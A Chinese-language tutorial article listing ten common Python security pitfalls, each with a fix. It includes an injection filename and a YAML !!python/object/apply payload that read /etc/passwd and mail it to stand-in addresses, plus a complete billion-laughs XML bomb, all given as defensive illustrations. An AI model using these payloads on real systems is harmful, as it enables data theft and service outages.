详细总结Python常见的安全问题


Posted in Python onMay 21, 2021

一、输入注入

注入攻击非常广泛而且很常见,注入有很多种类,它们影响所有的语言、框架和环境。

SQL 注入是直接编写 SQL 查询(而非使用 ORM) 时将字符串字面量与变量混合。

命令注入可能在使用 popen、subprocess、os.system 调用一个进程并从变量中获取参数时发生,当调用本地命令时,有人可能会将某些值设置为恶意值。

下面是个简单的脚本,使用用户提供的文件名调用子进程:

import subprocess

def transcode_file(request, filename):
    command = 'ffmpeg -i "{source}" output_file.mpg'.format(source=filename)
    subprocess.call(command, shell=True)  # a bad idea!

攻击者会将 filename 的值设置为“; cat / etc / passwd | mail them@domain.com 或者其他同样危险的东西。

修复:

如果你使用了 Web 框架,可以用附带的实用程序对输入进行清理,除非有充分的理由,否则不要手动构建 SQL 查询,大多数 ORM 都具有内置的消毒方法。

对于 shell,可以使用 shlex 模块正确地转义输入。

二、assert 语句(Assert statements)

不要使用 assert 语句来防止用户访问不应访问的代码段。

def foo(request, user):
   assert user.is_admin, “user does not have access”
   # secure code...

现在,默认情况下,Python 以 __debug__ 为 true 来执行脚本,但在生产环境中,通常使用优化运行,这将会跳过 assert 语句并直接转到安全代码,而不管用户是否是 is_admin

修复:

仅在与其他开发人员进行通信时使用 assert 语句,例如在单元测试中或为了防止不正确的 API 使用。

三、计时攻击(Timing attacks)

计时攻击本质上是一种通过计时比较提供值所需时间来暴露行为和算法的方式。计时攻击需要精确性,所以通常不能用于高延迟的远程网络。由于大多数 Web 应用程序涉及可变延迟,因此几乎不可能在 HTTP Web 服务器上编写计时攻击。

但是,如果你有提示输入密码的命令行应用程序,则攻击者可以编写一个简单的脚本来计算将其值与实际密码进行比较所需的时间。

修复:

使用在 Python 3.5 中引入的 secrets.compare_digest 来比较密码和其他私密值。

四、临时文件(Temporary files)

要在 Python 中创建临时文件,通常使用 mktemp() 函数生成一个文件名,然后使用该名称创建一个文件。 这是不安全的,因为另一个进程可能会在调用 mktemp() 和随后尝试通过第一个进程创建文件之间的空隙创建一个同名文件。这意味着应用程序可能加载错误的数据或暴露其他的临时数据。

如果调用不正确的方法,则最新版本的 Python 会抛出运行警告。

修复

如果需要生成临时文件,请使用 tempfile 模块并使用 mkstemp。

五、使用 yaml.load

引用 PyYAML 文档:

警告:使用从不可信源接收到的数据来调用 yaml.load 是不安全的! yaml.load 和pickle.load 一样强大,所以可以调用任何 Python 函数。

在流行的 Python 项目 Ansible 中这个例子,你可以将此值作为(有效)YAML 提供给 Ansible Vault,它使用文件中提供的参数调用 os.system()。

!!python/object/apply:os.system ["cat /etc/passwd | mail me@hack.c"]

所以,从用户提供的值中有效地加载 YAML 文件会让应用对攻击打开大门。

修复:

总是不优先使用 yaml.safe_load,除非你有一个非常好的理由。

六、解析 XML(Parsing XML)

如果你的应用程序要加载、解析 XML 文件,则你可能正在使用 XML 标准库模块。通过 XML 的攻击大多是 DoS 风格(旨在使系统崩溃而不是泄露数据),这些攻击十分常见,特别是在解析外部(即不可信任的)XML 文件时。

其中有个「billion laughs」,因为他的 payload 通常包含很多(十亿)「lols」。基本上,这个原理是可以在 XML 中使用参照实体,所以当解析器将这个 XML 文件加载到内存中时,它会消耗数 G 大小的内存(RAM)。

<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

另一些攻击使用外部实体扩展。XML 支持从外部 URL 引用实体,XML解析器通常会毫无疑问地获取并加载该资源。攻击者可以规避防火墙并访问受限制的资源,因为所有请求都是由内部可信的 IP 地址创建的,而不是来自外部。

需要考虑的另一种情况是依赖的第三方软件包需要解码 XML ,例如配置文件、远程 API。你甚至可能不知道某个依赖关系会将这些类型的攻击置之不理。

修复:

使用 defusedxml 替换标准库模块,它增加了针对这些类型攻击的安全防护。

七、受污染的 site-packages 或 import 路径

Python 的 import 系统非常灵活,当你想要为测试写补丁或重载核心功能时,这是非常棒的。

但这却是 Python 中最大的安全漏洞之一。

安装第三方软件包,无论是在虚拟环境中还是全局(通常不鼓励)都会让你看到这些软件包中的安全漏洞。有一些发布到 PyPi 的软件包与流行的软件包具有相似的名称,但是却执行了任意代码。

需要考虑的另一种情况是依赖的依赖,他们可能包含漏洞,他们也可以通过导入系统覆盖Python 中的默认行为。

修复

看看 http://PyUp.io 及其安全服务,为所有应用程序使用虚拟环境,并确保全局的 site-packages 尽可能干净,检查包签名。

八、序列化 Pickles

反序列化 pickle 数据和 YAML 一样糟糕。Python 类可以声明一个 __reduce__ 方法,该方法返回一个字符串,或一个可调用的元组以及使用 pickle 序列化时调用的参数。攻击者可以使用它来包含对其中一个子进程模块的引用,以在主机上运行任意命令。

修复

切勿使用 pickle 反序列化不受信任或未经身份验证来源的数据。改用另一种序列化模式(如JSON)。

九、使用系统 Python 运行时并且不修复它

大多数 POSIX 系统都自带有一个 Python 2 版本(通常是旧版本)。

有时候 Python(即 CPython 是用 C 语言编写的) 解释器本身存在漏洞, C 中的常见安全问题与内存分配有关,所以大多是缓冲区溢出错误,CPython 多年来一直存在一些溢出漏洞,每个漏洞都在后续版本中进行了修复。也就是说,如果及时升级 python 运行时,就很安全。

修复:

为生产应用程序安装最新版本的 Python,并及时安装修复更新!

十、不修复依赖关系

类似于不修补 python 运行时,还需要定期修补依赖关系。

修复

使用像 PyUp.io 这样的服务来检查更新,向应用程序提出 pr,并运行测试以保持软件包是最新的。

到此这篇关于详细总结Python常见的安全问题的文章就介绍到这了,更多相关Python安全问题内容请搜索三水点靠木以前的文章或继续浏览下面的相关文章希望大家以后多多支持三水点靠木!

Python 相关文章推荐
python实现的阳历转阴历(农历)算法
Apr 25 Python
python根据出生日期返回年龄的方法
Mar 26 Python
Python中转换角度为弧度的radians()方法
May 18 Python
从头学Python之编写可执行的.py文件
Nov 28 Python
ubuntu环境下python虚拟环境的安装过程
Jan 07 Python
使用Python搭建虚拟环境的配置方法
Feb 28 Python
Python 通配符删除文件的实例
Apr 24 Python
浅谈python中拼接路径os.path.join斜杠的问题
Oct 23 Python
pandas中DataFrame修改index、columns名的方法示例
Aug 02 Python
python opencv鼠标事件实现画框圈定目标获取坐标信息
Apr 18 Python
pycharm实现在子类中添加一个父类没有的属性
Mar 12 Python
python中的装饰器该如何使用
Jun 18 Python
Pycharm 如何设置HTML文件自动补全代码或标签
Python源码解析之List
Python手拉手教你爬取贝壳房源数据的实战教程
matlab xlabel位置的设置方式
浏览器常用基本操作之python3+selenium4自动化测试(基础篇3)
python 实现图与图之间的间距调整subplots_adjust
Jupyter notebook 不自动弹出网页的解决方案
You might like
编写Smarty插件在模板中直接加载数据的详细介绍
2013/06/26 PHP
两种php给图片加水印的实现代码
2020/04/18 PHP
php设计模式之组合模式实例详解【星际争霸游戏案例】
2020/03/27 PHP
JQuery与iframe交互实现代码
2009/12/24 Javascript
读jQuery之七 判断点击了鼠标哪个键的代码
2011/06/21 Javascript
nodejs中使用monk访问mongodb
2014/07/06 NodeJs
基于jQuery插件实现环形图标菜单旋转切换特效
2015/05/15 Javascript
XML文件转化成NSData对象的方法
2015/08/12 Javascript
基于slideout.js实现移动端侧边栏滑动特效
2016/11/28 Javascript
bootstrap模态框消失问题的解决方法
2016/12/02 Javascript
详解angularJS动态生成的页面中ng-click无效解决办法
2017/06/19 Javascript
Node.js如何实现注册邮箱激活功能 (常见)
2017/07/23 Javascript
基于JavaScript中标识符的命名规则介绍
2018/01/06 Javascript
VueJS实现用户管理系统
2020/05/29 Javascript
移动端JS实现拖拽两种方法解析
2020/10/12 Javascript
python中sleep函数用法实例分析
2015/04/29 Python
python搜索指定目录的方法
2015/04/29 Python
梯度下降法介绍及利用Python实现的方法示例
2017/07/12 Python
Python 实现使用dict 创建二维数据、DataFrame
2018/04/13 Python
Python numpy 点数组去重的实例
2018/04/18 Python
python连接mongodb密码认证实例
2018/10/16 Python
在python 中实现运行多条shell命令
2019/01/07 Python
python等差数列求和公式前 100 项的和实例
2020/02/25 Python
Python转换字典成为对象,可以用&quot;.&quot;方式访问对象属性实例
2020/05/11 Python
用HTML5 实现橡皮擦的涂抹效果的教程
2015/05/11 HTML / CSS
Pretty Little Thing爱尔兰:时尚女性服饰
2017/03/27 全球购物
职高毕业生自我鉴定
2013/10/21 职场文书
工作决心书范文
2014/03/11 职场文书
好习惯伴我成长演讲稿
2014/05/21 职场文书
授权委托书怎么写
2014/09/25 职场文书
教师个人自我剖析材料
2014/09/29 职场文书
高中教师个人工作总结
2015/02/10 职场文书
2015年七一建党节活动总结
2015/03/20 职场文书
Python如何识别银行卡卡号?
2021/06/10 Python
详解MySQL中的pid与socket
2021/06/15 MySQL
Python自动化测试PO模型封装过程详解
2021/06/22 Python